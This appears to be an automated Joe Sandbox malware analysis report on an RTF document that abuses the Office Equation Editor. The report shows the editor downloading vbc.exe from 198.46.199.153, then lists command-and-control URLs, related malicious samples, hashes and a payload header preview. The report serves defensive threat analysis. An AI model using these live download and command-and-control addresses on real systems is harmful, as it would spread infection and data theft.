            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmp100%Joe Sandbox ML

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            4.0.vbc.exe.400000.9.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            4.2.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            4.0.vbc.exe.400000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            4.0.vbc.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            cuteprofessionalscrubs.com4%VirustotalBrowse
            troddu.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            www.cuteprofessionalscrubs.com/9gr5/0%Avira URL Cloudsafe
            http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
            http://www.iis.fhg.de/audioPA0%URL Reputationsafe
            http://198.46.199.153/70007/vbc.exe0%Avira URL Cloudsafe
            http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
            http://treyresearch.net0%URL Reputationsafe
            http://java.sun.com0%URL Reputationsafe
            http://www.icra.org/vocabulary/.0%URL Reputationsafe
            http://computername/printers/printername/.printer0%Avira URL Cloudsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.mountfrenchlodge.net/9gr5/?gvT8Z=xQZabMU8dpACe7vSnuiwD/QS3vczr7oZL8st36+z5QOTIlaedyvl1J6mLYwfvajeV4x6zA==&wrx=KX64Xbs0GT80%Avira URL Cloudsafe
            http://www.cuteprofessionalscrubs.com/9gr5/?gvT8Z=ywSUfm2fQGK6UvQCK3y+m09HhIkd7Ec2I38ZOQmE/hAglw7BpPTyU9WfPvviQ4VjNkYSbA==&wrx=KX64Xbs0GT80%Avira URL Cloudsafe
            http://servername/isapibackend.dll0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            cuteprofessionalscrubs.com
            34.102.136.180
            truefalseunknown
            mountfrenchlodge.net
            34.102.136.180
            truefalse
              unknown
              troddu.com
              162.240.31.112
              truetrueunknown
              www.troddu.com
              unknown
              unknowntrue
                unknown
                www.cuteprofessionalscrubs.com
                unknown
                unknowntrue
                  unknown
                  www.mountfrenchlodge.net
                  unknown
                  unknowntrue
                    unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    www.cuteprofessionalscrubs.com/9gr5/true
                    • Avira URL Cloud: safe
                    low
                    http://198.46.199.153/70007/vbc.exetrue
                    • Avira URL Cloud: safe
                    unknown
                    http://www.mountfrenchlodge.net/9gr5/?gvT8Z=xQZabMU8dpACe7vSnuiwD/QS3vczr7oZL8st36+z5QOTIlaedyvl1J6mLYwfvajeV4x6zA==&wrx=KX64Xbs0GT8false
                    • Avira URL Cloud: safe
                    unknown
                    http://www.cuteprofessionalscrubs.com/9gr5/?gvT8Z=ywSUfm2fQGK6UvQCK3y+m09HhIkd7Ec2I38ZOQmE/hAglw7BpPTyU9WfPvviQ4VjNkYSbA==&wrx=KX64Xbs0GT8false
                    • Avira URL Cloud: safe
                    unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.windows.com/pctv.explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmpfalse
                      high
                      http://www.msn.com/?ocid=iehpgexplorer.exe, 00000005.00000000.421025770.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438992148.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.457833157.000000000449C000.00000004.00000001.sdmpfalse
                        high
                        http://investor.msn.comexplorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmpfalse
                          high
                          http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmpfalse
                            high
                            http://wellformedweb.org/CommentAPI/explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.423050629.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.421059058.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmpfalse
                              high
                              http://www.iis.fhg.de/audioPAexplorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEMexplorer.exe, 00000005.00000000.421288700.00000000045D6000.00000004.00000001.sdmpfalse
                                high
                                https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1-220explorer.exe, 00000005.00000000.421059058.00000000044E7000.00000004.00000001.sdmpfalse
                                  high
                                  http://windowsmedia.com/redir/services.asp?WMPFriendly=truevbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.hotmail.com/oeexplorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmpfalse
                                    high
                                    http://treyresearch.netexplorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmpfalse
                                      high
                                      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkvbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmpfalse
                                        high
                                        http://java.sun.comexplorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.icra.org/vocabulary/.vbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000003.00000002.416641477.0000000006610000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.416658417.0000000001BE0000.00000002.00020000.sdmpfalse
                                          high
                                          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000005.00000000.433667543.0000000008418000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.435363955.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.424711356.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.423050629.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.423102805.00000000083F5000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmpfalse
                                            high
                                            http://investor.msn.com/explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmpfalse
                                              high
                                              http://www.msn.com/?ocid=iehpexplorer.exe, 00000005.00000000.421025770.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438992148.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.457833157.000000000449C000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.msn.com/de-de/?ocid=iehpexplorer.exe, 00000005.00000000.421025770.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438992148.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.457833157.000000000449C000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.piriform.com/ccleanerexplorer.exe, 00000005.00000000.433667543.0000000008418000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.435363955.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.424711356.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.423050629.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.423102805.00000000083F5000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.421059058.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://computername/printers/printername/.printerexplorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    low
                                                    http://www.%s.comPAvbc.exe, 00000003.00000002.416641477.0000000006610000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.416658417.0000000001BE0000.00000002.00020000.sdmpfalse
                                                    • URL Reputation: safe
                                                    low
                                                    http://www.autoitscript.com/autoit3explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpfalse
                                                      high
                                                      https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=18(P&explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpfalse
                                                        high
                                                        http://www.msn.com/?ocid=iehpsexplorer.exe, 00000005.00000000.420524070.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438182629.0000000003D90000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://support.mozilla.orgexplorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpfalse
                                                            high
                                                            http://servername/isapibackend.dllexplorer.exe, 00000005.00000000.457413401.0000000003E50000.00000002.00020000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            low

                                                            Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            198.46.199.153
                                                            unknownUnited States
                                                            36352AS-COLOCROSSINGUStrue
                                                            34.102.136.180
                                                            cuteprofessionalscrubs.comUnited States
                                                            15169GOOGLEUSfalse

                                                            General Information

                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                            Analysis ID:528701
                                                            Start date:25.11.2021
                                                            Start time:17:23:10
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 10m 53s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:light
                                                            Sample file name:3nkW4MtwSD (renamed file extension from none to rtf)
                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                            Number of analysed new started processes analysed:9
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:1
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.troj.expl.evad.winRTF@10/9@3/2
                                                            EGA Information:Failed
                                                            HDC Information:
                                                            • Successful, ratio: 16.7% (good quality ratio 16%)
                                                            • Quality average: 73.5%
                                                            • Quality standard deviation: 27.8%
                                                            HCA Information:
                                                            • Successful, ratio: 95%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 0
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                            • Found warning dialog
                                                            • Click Ok
                                                            • Attach to Office via COM
                                                            • Scroll down
                                                            • Close Viewer
                                                            Warnings:
                                                            Show All
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                            • TCP Packets have been reduced to 100
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            17:24:14API Interceptor70x Sleep call for process: EQNEDT32.EXE modified
                                                            17:24:17API Interceptor146x Sleep call for process: vbc.exe modified
                                                            17:24:55API Interceptor146x Sleep call for process: raserver.exe modified
                                                            17:25:40API Interceptor1x Sleep call for process: explorer.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            198.46.199.153lSBl5Mhq80.rtfGet hashmaliciousBrowse
                                                            • 198.46.199.153/76734/VBC.exe
                                                            new order.docxGet hashmaliciousBrowse
                                                            • 198.46.199.153/76734/VBC.exe
                                                            new order.xlsxGet hashmaliciousBrowse
                                                            • 198.46.199.153/68886/VBC.exe
                                                            Neue Bestellung.xlsxGet hashmaliciousBrowse
                                                            • 198.46.199.153/566665/VBC.exe
                                                            purchase order.xlsxGet hashmaliciousBrowse
                                                            • 198.46.199.153/9994/VBC.exe
                                                            neworder.xlsxGet hashmaliciousBrowse
                                                            • 198.46.199.153/566665/vbc.exe
                                                            PO 35572 FOR CONTRA 23.08.xlsxGet hashmaliciousBrowse
                                                            • 198.46.199.153/1112/VBC.exe
                                                            PO 35572 FOR CONTRA 23.08.xlsxGet hashmaliciousBrowse
                                                            • 198.46.199.153/1112/VBC.exe
                                                            quotation.xlsxGet hashmaliciousBrowse
                                                            • 198.46.199.153/1112/VBC.exe
                                                            order2123.xlsxGet hashmaliciousBrowse
                                                            • 198.46.199.153/1112/VBC.exe

                                                            Domains

                                                            No context

                                                            ASN

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            AS-COLOCROSSINGUSEmployee payment plan.HTMGet hashmaliciousBrowse
                                                            • 23.95.214.111
                                                            ATT67586.HTMGet hashmaliciousBrowse
                                                            • 172.245.112.92
                                                            xF3wienie.xlsxGet hashmaliciousBrowse
                                                            • 198.23.207.111
                                                            Quote Request - Linde Tunisia.xlsxGet hashmaliciousBrowse
                                                            • 107.173.191.111
                                                            PO PENANG ORDER C0023.xlsxGet hashmaliciousBrowse
                                                            • 198.12.107.117
                                                            BANK-SWIFT.xlsxGet hashmaliciousBrowse
                                                            • 107.173.229.133
                                                            1HT42224.xlsxGet hashmaliciousBrowse
                                                            • 198.23.207.36
                                                            new order.xlsxGet hashmaliciousBrowse
                                                            • 198.23.251.13
                                                            Shipping Schedule.xlsxGet hashmaliciousBrowse
                                                            • 198.12.91.205
                                                            Product_Specification_Sheet.xlsxGet hashmaliciousBrowse
                                                            • 107.173.219.26
                                                            lod2.xlsxGet hashmaliciousBrowse
                                                            • 198.23.207.36
                                                            Payment Slip.xlsxGet hashmaliciousBrowse
                                                            • 198.46.136.245
                                                            20002.xlsxGet hashmaliciousBrowse
                                                            • 198.46.136.245
                                                            lSBl5Mhq80.rtfGet hashmaliciousBrowse
                                                            • 198.46.199.153
                                                            STATEMENT OF ACCOUNT.xlsxGet hashmaliciousBrowse
                                                            • 192.227.228.37
                                                            new order.docxGet hashmaliciousBrowse
                                                            • 198.46.199.153
                                                            Amended Order.xlsxGet hashmaliciousBrowse
                                                            • 192.3.121.173
                                                            Payment Swift.xlsxGet hashmaliciousBrowse
                                                            • 198.12.107.104
                                                            SOA.xlsxGet hashmaliciousBrowse
                                                            • 107.172.13.149
                                                            Play_VM_582497.htmGet hashmaliciousBrowse
                                                            • 192.3.161.195

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:downloaded
                                                            Size (bytes):739840
                                                            Entropy (8bit):7.768720486449457
                                                            Encrypted:false
                                                            SSDEEP:12288:QBzcmhiTyq+0tWTpvmEwyd2NR5SR72R6/NHJbBMa59mO/1flaMMdrixBFmRq:QBomhi+2WYEFdqu5NHJbBMa5Mdri1Wq
                                                            MD5:075BD1E3E3E0C01794EE6A84BE2C585A
                                                            SHA1:984A18333BCD137D00A2223A10B83946F0B3949D
                                                            SHA-256:42173F59707DE5929C3BC6CD37D5E0DC55D990BCE2C29AA6DEAC6E86C3EEC250
                                                            SHA-512:D00A949F26740996D4DA000ABC5B5241D812D3C7D1A1D0A92863A11F825B79333F20B4105BB2EAAD67472F1229E35BD6E056A27BE5C4418D639D18AEED3FC676
                                                            Malicious:true
                                                            Reputation:low
                                                            IE Cache URL:http://198.46.199.153/70007/vbc.exe
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a..............0..>...........[... ...`....@.. ....................................@.................................l[..O....`..H............................................................................ ............... ..H............text....<... ...>.................. ..`.rsrc...H....`.......@..............@..@.reloc...............H..............@..B.................[......H........H...!..........|j................................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmp
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                            Category:dropped
                                                            Size (bytes):5632
                                                            Entropy (8bit):4.215971182386183
                                                            Encrypted:false
                                                            SSDEEP:48:rf6resS6fB++YrNbC4FE/9c+FhHmJspzIf:+rexCBYrNbC4KFhPzy
                                                            MD5:A553A58C04781D311C71B7DA1B7CAD57
                                                            SHA1:10AD372D975F93EDA1DC9CD9A92D45992CA85F38
                                                            SHA-256:9BC8FBA0075B6F379D906661ACE1D80A764A1022213D127E3EAC56CFF5A41779
                                                            SHA-512:8C706B34EF18F8CE68401E6B9DF47EDF10D2BE81CA7725BC480412ED4BDB146EDF03CBF502721227CB1D132313F5131E62B94774617BF462FCB9B785E3E26BB6
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Reputation:low
                                                            Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{105A16FA-9724-40E9-B86D-EF139A6795E6}.tmp
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6656
                                                            Entropy (8bit):3.5345865006836488
                                                            Encrypted:false
                                                            SSDEEP:96:YyOv6PI3Jv6BweyjGQ803dRybHF9qXXy3dwZ4HoCmWJZ3qrlircuA:YyGZh6meu80NRybl2WbZ6rErcZ
                                                            MD5:9E74D0391BDB20A19FCE576A18E374DD
                                                            SHA1:CAD0F85D1E24708A6CE05BB7791BCD8A1DE982D4
                                                            SHA-256:1A183A30D730EAE29C9EBFBF5DC2FD0B9F40BBCEAC2FFBD896C7778AED5B937D
                                                            SHA-512:F14F7D10706E955DA2D267BC28871D2342B10E8B7CD65FA7555E3B7157C8CD03BA8831CDC896495AE542C60749766E6137E007D657AE3599FB200558716DAB9B
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: &.-.+.4.!.?.7.$.>.|...|.:.+.%.]._...!.4.#.&...2.`.(.2...?.1.-.....+.|.$.>.=.8.+...0.3.0.+.4.*.?.%./.+.~.,.<.6.6.7.<.?.?.?.%.)./.|.>.!.|.!...%.|.^.?.`...3.'.?.|.8.-.).?.'.%.%.$.6.^.;.,.?.%.7...$.?.9.8.3.(.2.(.+.?...?.|.=...8.?.8.|.*.7.,.!.5._.^.].5.|.7.,.[.?.?.3...!...0.'.).?.8...?.6.&.5.3...;.`.'.?./.2.%.?.?.4.1.?.%._.+.*.`.).%.^.-.*.&.>.,.9.6.(...[.~.3.?.2...=.,.`.7.8.).!.%.?.8.1.^.).7.3.6...@.[._.?...6.7.%.?.+.-.&.:.@.?.?.=.>.0.>.;.3.).?...+.0.].=.?.~.?._.?.].?.$.8.2.;.@.%.7.=.~.<.3.!.3.2.@...2.7.6.9.5.'.7.~.#./.].5./.<.=.:.9.!.8.9.].3.;.4.>._.>.@.....?.@.?.`.?.9.-.(.*.;.;.4.1.].?.^...,.*.[.<.8.].....?.?._.%.?.>.:.8.-.7.5.?.~.:.%.:._.3.7.@.'.[.0.+.%.9.;.$.9.^...:.:.9.?...(.[.>.$.:.|.3...,.|.$.&.&.?.;.3.3.>...4./.5.+.7.3.%.'.1.3.4.3.=.?.;.@.3.!.?.3.'...*.[...,.#.'./.5.&.!.!.*.:.3.~.?.2./.&.%.#.?.?.(.?._...[.4.*...*.^...<.^.,.|.(.,.[.?.(.).?.4.].-.+.<.*.?.%.%.>...&.).0.*.`.%.8.0.=.>.(.,.`...-...[.0.;.?.#.<.1.,.-.0.:.'.$.2.@.'.(.$.!._.3.;.].!.,.8.....6...0.?.-.?.3.'.9.0.@.,.].*.@.@.%.<.
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B3E201F6-E172-4FB7-8EA2-C5E78A0177C3}.tmp
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1024
                                                            Entropy (8bit):0.05390218305374581
                                                            Encrypted:false
                                                            SSDEEP:3:ol3lYdn:4Wn
                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\3nkW4MtwSD.LNK
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Nov 26 00:24:08 2021, mtime=Fri Nov 26 00:24:08 2021, atime=Fri Nov 26 00:24:12 2021, length=22268, window=hide
                                                            Category:dropped
                                                            Size (bytes):1014
                                                            Entropy (8bit):4.543786462395175
                                                            Encrypted:false
                                                            SSDEEP:12:8w5eFgXg/XAlCPCHaX6zBFB/IGUX+WNwfLkx0sOicvbSRkCl4S0seDtZ3YilMMEO:8w5y/XTKz3WhrHte2NHeDv3qlQd7Qy
                                                            MD5:0CAB2B6943F0D12CA4B6285B22202999
                                                            SHA1:AD018F3F3F6BAC905FC8999CCBAD2190A60FDCA0
                                                            SHA-256:A993ED6EB3B351B317C05744C641294B9A2CD735E57E8BBF4666C74C222C74FC
                                                            SHA-512:8424761740A2D9AEBC20190AC3FF290B782FC1B2C92E45FD6BE91376F47A0C4542EFB59437B8C7C587BE2892721E7EE749C3B63D307BA09CE6D0227C7E9CCB39
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: L..................F.... ...(..Od...(..Od.....Qd....V...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.....z.1.....zS....Desktop.d......QK.XzS..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..V..zS.. .3NKW4M~1.RTF..J......zS..zS..*.........................3.n.k.W.4.M.t.w.S.D...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\287400\Users.user\Desktop\3nkW4MtwSD.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.3.n.k.W.4.M.t.w.S.D...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......287400..........D_....3N...W...9..g............[D_....3N...W...9..g...
                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):72
                                                            Entropy (8bit):4.891962939381966
                                                            Encrypted:false
                                                            SSDEEP:3:bDuMJlHCoP/SmxWJToP/Sv:bCICoXeToXc
                                                            MD5:98198491AD9C6556CF158DF33B3EC4E5
                                                            SHA1:5FDDCDD11FD061308338442F8CDDFB10E536A397
                                                            SHA-256:E97FB0507D819A0D2EE95DFB51A9544E4907033C8F2FA486B6F4B584572EA5B8
                                                            SHA-512:6876CE8FE8FA0A5B1C7956B664F95FD1D0EA0CF69C719A82BF3EAE7830CC70C66D0AB9F266568C804D8FF1C85E60E43977A2481B12728CD0FBC074A3FF66D5BE
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: [folders]..Templates.LNK=0..3nkW4MtwSD.LNK=0..[misc]..3nkW4MtwSD.LNK=0..
                                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):162
                                                            Entropy (8bit):2.503835550707526
                                                            Encrypted:false
                                                            SSDEEP:3:vrJlaCkWtVyYpfHh233WWPAyfGpKyH/ln:vdsCkWtxJgJXKl
                                                            MD5:6462452E1083FFF3724A32DC01771E8B
                                                            SHA1:244116899824E727C5C399064F004C71D88F7254
                                                            SHA-256:869216753E7235557D0BDCC32046E7DA62B2DD69B9B7175F27AD546161F1EB2A
                                                            SHA-512:303C93E9E5AB236053693ECE6B9925F4E451EE28834A46DCF2A23311CD254F022967632852AFEB46E4C842DCE42072192F0B726B48FBBE9D5FA907918B71CE88
                                                            Malicious:false
                                                            Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                            C:\Users\user\Desktop\~$kW4MtwSD.rtf
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):162
                                                            Entropy (8bit):2.503835550707526
                                                            Encrypted:false
                                                            SSDEEP:3:vrJlaCkWtVyYpfHh233WWPAyfGpKyH/ln:vdsCkWtxJgJXKl
                                                            MD5:6462452E1083FFF3724A32DC01771E8B
                                                            SHA1:244116899824E727C5C399064F004C71D88F7254
                                                            SHA-256:869216753E7235557D0BDCC32046E7DA62B2DD69B9B7175F27AD546161F1EB2A
                                                            SHA-512:303C93E9E5AB236053693ECE6B9925F4E451EE28834A46DCF2A23311CD254F022967632852AFEB46E4C842DCE42072192F0B726B48FBBE9D5FA907918B71CE88
                                                            Malicious:false
                                                            Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                            C:\Users\Public\vbc.exe
                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):739840
                                                            Entropy (8bit):7.768720486449457
                                                            Encrypted:false
                                                            SSDEEP:12288:QBzcmhiTyq+0tWTpvmEwyd2NR5SR72R6/NHJbBMa59mO/1flaMMdrixBFmRq:QBomhi+2WYEFdqu5NHJbBMa5Mdri1Wq
                                                            MD5:075BD1E3E3E0C01794EE6A84BE2C585A
                                                            SHA1:984A18333BCD137D00A2223A10B83946F0B3949D
                                                            SHA-256:42173F59707DE5929C3BC6CD37D5E0DC55D990BCE2C29AA6DEAC6E86C3EEC250
                                                            SHA-512:D00A949F26740996D4DA000ABC5B5241D812D3C7D1A1D0A92863A11F825B79333F20B4105BB2EAAD67472F1229E35BD6E056A27BE5C4418D639D18AEED3FC676
                                                            Malicious:true
